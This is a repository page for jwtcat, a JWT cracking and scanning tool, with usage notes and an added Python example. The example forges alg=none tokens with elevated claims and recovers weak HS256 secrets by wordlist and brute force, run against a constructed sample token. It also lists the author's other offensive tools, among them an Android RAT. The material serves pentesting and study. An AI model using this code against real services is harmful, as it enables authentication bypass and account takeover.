  • Stars: 283
  • Rank: 146,066 (Top 3 %)
  • Language: Python
  • License: Apache License 2.0
  • Created almost 8 years ago
  • Updated about 2 years ago

Repository Details

A CPU-based JSON Web Token (JWT) cracker and - to some extent - scanner.

jwtcat

jwtcat is a Python script designed to detect and exploit well-known cryptographic flaws present in JSON Web Tokens (JWT).

These vulnerabilities, if successfully exploited by an adversary, could allow authentication bypass and information disclosure, and could ultimately lead to the compromise of an entire information system.

More information about JWT vulnerabilities can be found at:

Features

  • Tests for the following vulnerability:
    • CVE-2018-1000531: JWT signature bypass because the verifier accepts the "none" algorithm (alg=none) and skips signature validation
  • Guessing attacks against the shared secret of JWTs signed with HS256 (HMAC-SHA256):
    • Brute-force attacks
    • Wordlist attacks

Requirements

jwtcat is written in Python 3 and requires Python 3.6 or later, in addition to the following libraries:

Installation

  1. Clone the repository:

    git clone https://github.com/AresS31/jwtcat
    cd jwtcat
  2. (Optional but recommended) Create and activate a new Python virtual environment:

    1. Create the virtual environment:

      python -m venv env
    2. Activate the newly created environment:

      • On POSIX:

        source ./env/bin/activate
      • On Windows:

        ./env/Scripts/Activate.ps1
  3. Install dependencies:

    python -m pip install -r requirements.txt

Usage

  • To list the available options:

    python jwtcat.py -h
  • To list available options specific to brute force attacks:

    python jwtcat.py brute-force -h


  • To list available options specific to wordlist attacks:

    python jwtcat.py wordlist -h


  • To list available options specific to vulnerability testing (CVE-2018-1000531 and HS256 brute-force attacks):

    python jwtcat.py vulnerable -h

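The two checks listed under Features (alg=none acceptance, and guessing an HS256 secret by wordlist or brute force) reduced to standard-library Python. This is an added example, not code from the jwtcat project or its author; the sample token, the weak secret `secret123` and the four-entry wordlist are constructed here, and the function names are this example's own.

```python
import base64
import hashlib
import hmac
import itertools
import json
from typing import Iterable, Optional, Tuple


def b64url_encode(data: bytes) -> str:
    """Unpadded base64url, the encoding JWS mandates for every segment."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(segment: str) -> bytes:
    """Inverse of b64url_encode; re-adds the padding the base64 module needs."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def split_jwt(token: str) -> Tuple[dict, dict, str, str, str]:
    """Return (header, payload, header_b64, payload_b64, signature_b64)."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("a compact JWS has exactly three dot-separated segments")
    header_b64, payload_b64, sig_b64 = parts
    return (json.loads(b64url_decode(header_b64)),
            json.loads(b64url_decode(payload_b64)),
            header_b64, payload_b64, sig_b64)


def hs256_mac(signing_input: bytes, secret: bytes) -> bytes:
    """HS256 is plain HMAC-SHA256 over 'header_b64.payload_b64' with a shared secret."""
    return hmac.new(secret, signing_input, hashlib.sha256).digest()


def sign_hs256(payload: dict, secret: bytes) -> str:
    """Mint a valid HS256 token; used here only to build the constructed sample."""
    header_b64 = b64url_encode(b'{"alg":"HS256","typ":"JWT"}')
    payload_b64 = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    signing_input = f"{header_b64}.{payload_b64}".encode("ascii")
    return f"{header_b64}.{payload_b64}.{b64url_encode(hs256_mac(signing_input, secret))}"


def uses_alg_none(token: str) -> bool:
    """Detect the unsigned form. Compare case-insensitively: some verifiers only
    reject the exact string 'none' and let 'None' / 'NONE' through."""
    return str(split_jwt(token)[0].get("alg", "")).lower() == "none"


def forge_alg_none(token: str, claims: dict) -> str:
    """Exploit side of an alg=none bypass: keep the claims, set alg=none, drop the
    signature. A verifier that trusts the alg field of the untrusted header accepts it."""
    payload = {**split_jwt(token)[1], **claims}
    header_b64 = b64url_encode(b'{"alg":"none","typ":"JWT"}')
    payload_b64 = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    return f"{header_b64}.{payload_b64}."


def crack_hs256(token: str, candidates: Iterable[bytes]) -> Optional[bytes]:
    """Recompute the MAC under each candidate secret; the first match is the key."""
    header, _, header_b64, payload_b64, sig_b64 = split_jwt(token)
    if header.get("alg") != "HS256":
        raise ValueError(f"not an HS256 token (alg={header.get('alg')!r})")
    signing_input = f"{header_b64}.{payload_b64}".encode("ascii")
    expected = b64url_decode(sig_b64)
    for secret in candidates:
        if hmac.compare_digest(hs256_mac(signing_input, secret), expected):
            return secret
    return None


def wordlist_candidates(lines: Iterable[str]) -> Iterable[bytes]:
    """Wordlist mode: one candidate per non-empty line, as read from a rockyou-style file."""
    for line in lines:
        word = line.rstrip("\r\n")
        if word:
            yield word.encode("utf-8")


def brute_force_candidates(charset: str, max_len: int) -> Iterable[bytes]:
    """Brute-force mode: every string over charset up to max_len, shortest first.
    The search space is sum(len(charset)**n), so keep max_len small on a CPU."""
    for length in range(1, max_len + 1):
        for combo in itertools.product(charset, repeat=length):
            yield "".join(combo).encode("ascii")


# Constructed sample (not a real token): signed with a weak secret, plus a tiny wordlist.
SAMPLE_TOKEN = sign_hs256({"sub": "alice", "admin": False}, b"secret123")
SAMPLE_WORDLIST = ["password\n", "letmein\n", "secret123\n", "\n"]

if __name__ == "__main__":
    print("alg=none?", uses_alg_none(SAMPLE_TOKEN))
    print("wordlist hit:", crack_hs256(SAMPLE_TOKEN, wordlist_candidates(SAMPLE_WORDLIST)))
    print("forged:", forge_alg_none(SAMPLE_TOKEN, {"admin": True}))
```

Two points the functions make explicit: the secret is recovered by recomputing the MAC over the base64url header and payload exactly as received (re-encoding the JSON would change whitespace and break the comparison), and the alg=none check must be case-insensitive, because a verifier that rejects only the lowercase string is still bypassable. The brute-force generator is exponential in length; wordlist mode is where real cracks come from.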

Roadmap

  • Implement additional attack vectors.
  • Implement support for multithreading or multiprocessing.
  • Implement support for the -tF, --token-file switch.
  • Improve the code logic for:
    • TQDM integration with the logger.
  • Improve the script's performance.

Changelog

v1.1 - May 2020:

  • Added checks to see if JWT is signed with HS256.
  • Added checks to see if JWT is vulnerable to CVE-2018-1000531.
  • Added potfile options.
  • Added support for brute-force attacks.
  • Code refactoring.
  • Improved the standard output formatting.
  • Switched from python-colorlog to coloredlogs.

Sponsor 💖

If you want to support this project and appreciate the time invested in developing, maintaining and extending it, consider donating toward my next cup of coffee. ☕

It is easy: all you have to do is press the Sponsor button at the top of this page or alternatively click this link. 💸

Reporting Issues

Found a bug? I would love to squash it! πŸ›

Please report all issues on the GitHub issues tracker.

Contributing

Would you like to contribute to improving this project? 🤩

Please submit all PRs on the GitHub pull requests tracker.

License

See LICENSE.

More Repositories

  1. burpgpt (Java, 1,682 stars): A Burp Suite extension that integrates OpenAI's GPT to perform an additional passive scan for discovering highly bespoke vulnerabilities, and enables running traffic-based analysis of any type.
  2. wirespy (Shell, 518 stars): Framework designed to automate various wireless network attacks (the project was presented on Pentester Academy TV's toolbox in 2017).
  3. swurg (Java, 176 stars): Parse OpenAPI documents into Burp Suite for automating OpenAPI-based API security assessments (approved by PortSwigger for inclusion in their official BApp Store).
  4. xmlrpc-bruteforcer (Python, 97 stars): Multi-threaded XML-RPC brute forcer using amplification attacks targeting WordPress installations prior to version 4.4.
  5. flarequench (Java, 57 stars): Burp Suite plugin that adds additional checks to the passive scanner to reveal the origin IP(s) of Cloudflare-protected web applications.
  6. smbaudit (Shell, 41 stars): Perform various SMB-related attacks, particularly useful for testing large Active Directory environments.
  7. sci (Smali, 36 stars): Framework designed to automate the process of assembly code injection (trojanising) within Android applications.
  8. spyware (Java, 31 stars): An Android RAT that collects various sensitive information in real time and sends it to the attacker's database.
  9. google-authenticator (Java, 26 stars): Burp Suite plugin that dynamically generates Google 2FA codes for use in session handling rules (approved by PortSwigger for inclusion in their official BApp Store).
  10. pentest2xlsx (Python, 24 stars): Excel parser for various pentesting tools.
  11. vulcan (PowerShell, 13 stars): A PowerShell script that simplifies life and therefore... phishing.
  12. ness6nmap2xlsx (Python, 13 stars): XLSX parser for Nessus and Nmap scan results.
  13. clm-rout (C#, 12 stars): A C# program featuring an all-in-one bypass for CLM, AppLocker and AMSI using Runspace.
  14. testssl2xlsx (Python, 11 stars): Excel parser for testssl scan results.
  15. copy-as-powershell-requests (Java, 11 stars): Copy as PowerShell request(s) plugin for Burp Suite (approved by PortSwigger for inclusion in their official BApp Store).
  16. openvpn-stat (Python, 8 stars): Display OpenVPN connected clients and their associated routing information in a user-friendly fashion.
  17. powershell-utils (PowerShell, 7 stars): A collection of PowerShell scripts for pentesting activities.
  18. phishstat (Python, 7 stars): Generate various types of statistics from phishing engagement results.
  19. raadef (Rust, 6 stars): An extensible Rust-based exploitation framework designed to audit/attack Azure AD environments.
  20. centralized-messaging (C, 5 stars): Centralized messaging system.
  21. bloodhound-utils (5 stars): A collection of utility scripts/files designed to extend/facilitate BloodHound capabilities.
  22. solstice-pod-cves (5 stars): Various CVEs for Solstice Pod from Mersive Technologies.
  23. xor-crypter (C, 4 stars): XOR file encryptor.
  24. distributed-chat (Java, 4 stars): Distributed chat system.
  25. net-ninny-proxy (Java, 4 stars): Web proxy coupled with a URL-based and content-based filter.
  26. c-q (PHP, 3 stars): Interactive, multi-user, multi-session web platform for quizzes and courses.
  27. docker_burp-enterprise (Dockerfile, 3 stars): Attempt at dockerizing Burp Enterprise v2022.4.
  28. cve-2017-12945 (Python, 3 stars): Exploit for CVE-2017-12945.
  29. GLPI (Java, 3 stars): Gestionnaire libre de parc informatique (Free Management of Computer Equipment).
  30. corellium-utils (JavaScript, 3 stars): A collection of utility scripts leveraging the Corellium API and designed to facilitate mobile pentesting.
  31. dotfiles (1 star): A collection of dotfiles.
  32. aress31 (1 star): A ✨special✨ place that offers an insight into a subset of my work.